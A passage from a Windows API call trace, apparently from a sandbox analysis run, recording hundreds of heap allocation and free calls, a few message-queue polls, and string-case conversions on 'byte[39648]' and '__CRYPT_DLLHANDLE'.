pbData=0x0*, pdwDataLen=0x8cef60*=0x9ae0) returned 1 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0265.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0265.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0265.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0265.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0265.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0265.615] CharLowerBuffW (in: lpsz="byte[39648]", cchLength=0xb | out: lpsz="byte[39648]") returned 0xb [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9ae0) returned 0x2f330d0 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0265.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0265.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f3cbb8 [0265.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0xe50048 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3cbb8 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.622] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.622] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 